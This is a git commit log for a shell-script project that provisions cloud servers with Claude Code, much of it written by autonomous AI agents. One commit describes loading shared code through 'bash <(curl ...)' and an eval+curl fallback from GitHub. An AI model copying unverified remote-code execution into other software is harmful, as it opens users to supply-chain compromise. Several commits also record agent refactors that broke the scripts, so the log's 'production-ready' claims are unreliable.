- All improvements add context and next steps rather than just stating the problem

Hetzner library improvements (hetzner/lib/common.sh):
- Replaced technical "Remediation" with friendly "How to fix"
- Changed log_warn to log_error for error conditions (consistent severity)
- Added spacing for better readability of multi-line errors
- Made server creation errors more specific about account issues

All changes focus on helping users understand WHAT went wrong and HOW to fix it.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat: Replace issue-triager with community-coordinator agent

Replace the issue-triager agent in the refactor team with a
community-coordinator that actively engages with GitHub issues:
acknowledges reports, posts interim updates, delegates to relevant
teammates, and posts final resolutions — so reporters feel heard.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-09 02:58:26 -08:00
Sprite
6d4eca6d5d refactor: add SC2154 disable for API token variables
- hetzner/lib/common.sh:31 - HCLOUD_TOKEN set by caller
- digitalocean/lib/common.sh:36 - DO_API_TOKEN set by caller
- Silences false positive warnings for intentionally external variables
- These tokens are exported by ensure_*_token functions before use
2026-02-08 03:21:48 +00:00
Sprite
0f5a11b1c9 fix: repair broken Python error parsing in Hetzner and DigitalOcean (CRITICAL)
Fixed 2 critical syntax errors in API error handling:
- Hetzner line 160-161: Malformed error_msg assignment
- DigitalOcean line 172-173: Broken error_msg assignment

These were introduced during Round 15 refactoring and would crash
whenever users encountered API errors during server creation.

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-08 03:05:38 +00:00
Sprite
55ef42c82e refactor: add shellcheck disables for intentional SSH_OPTS word splitting
Add SC2086 disable comments to interactive_session() functions in
GCP, Hetzner, and DigitalOcean providers. SSH_OPTS is intentionally
unquoted to allow word splitting for multiple SSH options.

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-08 02:56:08 +00:00
Sprite
f20568aea0 fix: repair broken Python multi-line assignments in 3 providers
Fixed malformed Python command assignments in:
- hetzner/lib/common.sh: Separated declaration and assignment for error_msg and userdata_json
- digitalocean/lib/common.sh: Fixed error_msg assignment split across lines
- vultr/lib/common.sh: Fixed saved_key and two error_msg assignments

Pattern applied: Separate `local var` declaration from `var=$(command)` assignment
to avoid bash syntax errors.

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-08 02:47:13 +00:00
Sprite
3b6c761904 refactor: add username parameter to generic_ssh_wait
- Add required username parameter to generic_ssh_wait()
- Update SSH command to use dynamic username instead of hardcoded "root"
- Update all existing callers to pass username explicitly
- Enables GCP and AWS Lightsail to adopt generic_ssh_wait in future

Score: 40 (Impact: 8, Confidence: 10, Risk: 2)
2026-02-08 01:58:48 +00:00
Sprite
f2afdea792 refactor: extract ensure_ssh_key duplication to shared library (~220 lines)
Eliminates duplicate SSH key registration logic across 5 cloud providers
(Hetzner, DigitalOcean, Vultr, Linode, Lambda) by introducing a generic
callback-based pattern in shared/common.sh.

Before: Each provider had ~45 lines of nearly identical code for:
- Generating SSH keys if missing
- Getting fingerprints
- Checking if key exists with provider
- Registering key if not exists
- Error handling

After: Providers implement 2 simple callbacks:
- check_callback: provider-specific API call to check if key exists
- register_callback: provider-specific API call to register key

The shared function handles:
- Key generation (via generate_ssh_key_if_missing)
- Fingerprint extraction (via get_ssh_fingerprint)
- Flow control and logging
- Callback orchestration

Changes:
- shared/common.sh: Added ensure_ssh_key_with_provider() function
- hetzner/lib/common.sh: Refactored to use callbacks
- digitalocean/lib/common.sh: Refactored to use callbacks
- vultr/lib/common.sh: Refactored to use callbacks
- linode/lib/common.sh: Refactored to use callbacks
- lambda/lib/common.sh: Refactored to use callbacks

Benefits:
- DRY: Eliminates ~220 lines of duplicate code
- Maintainability: Bug fixes in registration flow benefit all providers
- Consistency: All providers use identical registration logic
- Extensibility: New providers can reuse this pattern

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-08 01:33:06 +00:00
Sprite
a631faf4fe refactor: suppress SC2086 for intentional SSH_OPTS word splitting
SSH_OPTS contains multiple flags that must be word-split, so unquoted
usage is intentional. Added shellcheck directives to suppress false
positive warnings across all cloud provider common.sh files.

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-08 01:29:56 +00:00
Sprite
331fa3a6ac refactor: replace raw color echo with log_warn in provider libraries
Replaced raw echo -e "${YELLOW}...${NC}" statements with log_warn calls
in ensure_*_token functions across all provider libraries. This fixes
SC2154 shellcheck warnings for undeclared YELLOW and NC color variables
and improves code consistency.

Files changed:
- digitalocean/lib/common.sh:62
- hetzner/lib/common.sh:60
- linode/lib/common.sh:49
- vultr/lib/common.sh:55
- lambda/lib/common.sh:49
- e2b/lib/common.sh:52

Benefits:
- Eliminates 6 SC2154 shellcheck warnings
- Uses centralized logging function that already handles yellow coloring
- Improves code maintainability and consistency

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-08 01:20:43 +00:00
Sprite
0b4fe29026 refactor: fix SC2154 warnings for SSH_OPTS in provider libraries
Added shellcheck directive comments before first SSH_OPTS usage in:
- aws-lightsail/lib/common.sh
- gcp/lib/common.sh
- lambda/lib/common.sh
- vultr/lib/common.sh
- linode/lib/common.sh
- hetzner/lib/common.sh
- digitalocean/lib/common.sh

SSH_OPTS is defined in shared/common.sh but shellcheck can't detect
cross-file variable definitions, so we suppress the warning with
an explanatory comment.

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-08 01:20:06 +00:00
Sprite
0ad6680f1f refactor: extract duplicate get_server_name logic to shared function
- Add get_resource_name() to shared/common.sh
  - Generic function for env-var-or-prompt pattern
  - Uses indirect expansion ${!var} for dynamic env vars
  - Preserves exact behavior: env check → prompt → error

- Update 9 cloud providers to use shared function:
  - aws-lightsail: LIGHTSAIL_SERVER_NAME
  - digitalocean: DO_DROPLET_NAME (with validation)
  - gcp: GCP_INSTANCE_NAME
  - hetzner: HETZNER_SERVER_NAME (with validation)
  - linode: LINODE_SERVER_NAME (with validation)
  - sprite: SPRITE_NAME (with validation)
  - vultr: VULTR_SERVER_NAME (with validation)
  - e2b: E2B_SANDBOX_NAME
  - modal: MODAL_SANDBOX_NAME

- Reduces code duplication: ~120 lines → ~25 lines
- Maintains backward compatibility (env vars, prompts, errors unchanged)

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-08 01:16:20 +00:00
L
591066cd53
Use ${VAR:-} for all optional env var checks (#28)
Protects against 'unbound variable' errors even if set -u is
re-enabled or inherited. Every [[ -n "$UPPER_VAR" ]] pattern now
uses [[ -n "${UPPER_VAR:-}" ]] to safely default to empty.

Co-authored-by: Sprite <noreply@sprite.dev>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-07 16:28:12 -08:00
L
4087deb14e
Drop nounset (set -u) flag — incompatible with env var checks (#27)
The autonomous refactoring added `set -euo pipefail` but the scripts
check optional env vars with `[[ -n "$VAR" ]]` which is a fatal error
under nounset when the var isn't set (e.g. SPRITE_NAME, OPENROUTER_API_KEY).

Fix: downgrade to `set -eo pipefail` across all 42 affected files.

Co-authored-by: Sprite <noreply@sprite.dev>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-07 16:22:04 -08:00
L
7e952d1310
Fix shared/common.sh loading for curl-piped execution (#26)
When scripts run via `bash <(curl ...)`, BASH_SOURCE resolves to
/dev/fd/N, making the relative path `../../shared/common.sh` fail.

Fix: add remote fallback — try local file first, fall back to
fetching shared/common.sh from GitHub via eval+curl.

Applied to all 5 refactored lib/common.sh files (sprite, hetzner,
digitalocean, vultr, linode).

Co-authored-by: Sprite <noreply@sprite.dev>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-07 16:16:51 -08:00
L
3fb2e77b03
Autonomous refactoring: 5 rounds, ~1,400 lines eliminated, production-ready
Five rounds of autonomous AI agent team refactoring with security fixes, code consolidation, and expanded test coverage.
2026-02-08 00:06:46 +00:00
L
6ac59e6bb3
Fix OAuth server for macOS bash 3.x (#24)
Three issues broke the OAuth callback server on macOS:

1. echo -e doesn't work in bash 3.x — \r\n appears as literal text
   in the HTTP response, browser gets malformed headers.
   Fix: pre-write response with printf to a file before the subshell.

2. local variables inside ( ... ) & subshell — undefined behavior in
   bash 3.x since subshells aren't function scope.
   Fix: use plain variables in subshells.

3. ((elapsed++)) when elapsed=0 evaluates to falsy — set -e kills
   the script on the first iteration of the timeout loop.
   Fix: use elapsed=$((elapsed + 1)) instead.

Also simplified nc_listen detection to only check for BusyBox
(the -p flag check could misfire on macOS nc).

Applied to all 10 lib/common.sh files.

Co-authored-by: Sprite <noreply@sprite.dev>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-07 14:21:47 -08:00
L
bd30565d86
Add Hetzner Cloud spawn system for provisioning servers via REST API (#4)
Parallel to the existing sprite/ directory, adds hetzner/ scripts that
provision Hetzner Cloud servers with Claude Code + OpenRouter using
curl-based API calls (no hcloud CLI dependency).

Co-authored-by: Sprite <noreply@sprite.dev>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-07 07:25:03 -08:00